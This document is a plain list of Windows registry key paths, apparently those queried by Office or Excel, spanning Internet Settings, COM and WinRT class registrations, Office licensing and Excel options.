HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Containers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Containers
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Containers\SecureAutoProxy
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\dnscache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download\FeatureEnableTokenBindingOverride
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_TOKEN_BINDING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_TOKEN_BINDING
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_TOKEN_BINDING
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableHttp2ConnectionSharing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableHttp2ConnectionSharing
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\XAML
HKEY_LOCAL_MACHINE\Software\Microsoft\XAML
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\XAML\OneCoreTransformsEnabledByDefault
HKEY_CURRENT_USER\Control Panel\Colors
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent
HKEY_CURRENT_USER\Software\Classes\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyQueryWithFullUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\Elevation
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Personalization
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EdpEnforcementOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EdpEnforcementOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions
HKEY_CLASSES_ROOT\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\PolicyExtensions
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\QuicTestHost
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\ValidationSinkHandlerName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PrivacyDialogsDisabled
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security\DLP
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\DLP
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Cloud\Office\16.0\Excel\DisabledCmdBarItemsList
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\0
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\0
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\0
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\1
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\2
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\2
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\3
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\3
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\3
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\4
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\4
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\RestrictedProtocols\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_CURRENT_USER\Software\Classes\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{733B7764-5C0C-4AD6-BB4B-D0585E993E0E}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{733B7764-5C0C-4AD6-BB4B-D0585E993E0E}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{733B7764-5C0C-4AD6-BB4B-D0585E993E0E}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{733B7764-5C0C-4AD6-BB4B-D0585E993E0E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{733B7764-5C0C-4AD6-BB4B-D0585E993E0E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{733B7764-5C0C-4AD6-BB4B-D0585E993E0E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{733B7764-5C0C-4AD6-BB4B-D0585E993E0E}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\NetworkStatusCache
HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies\0ff1ce15-a989-479d-af46-f275c6370663\de52bd50-9564-4adc-8fcb-a345c17f84f9\Value
HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies\0ff1ce15-a989-479d-af46-f275c6370663\de52bd50-9564-4adc-8fcb-a345c17f84f9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Viewer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LicenseAggregateSubscription
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\ViewerMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdAggregationForApp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdAggregationForApp\Excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdAggregationForApp
HKEY_CLASSES_ROOT\Outlook.Application
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableRobustifiedUNC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Defender\Features
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Defender\Features\SenseDlpEnabled
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Personalization\Insights
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Personalization\Insights
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\FixedFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FixedFormat
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security\Labels
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\Labels
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Font
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\MemoryLevelOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UndoHistory
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargePivotTables
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoRowThousandCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargeDataModels
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoDataModelSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PreferExcelDataModel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSuggestCompatFmlaVariation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableIdleMemoryFlush
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableEDPIsIdentityManagedGate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\DllPath
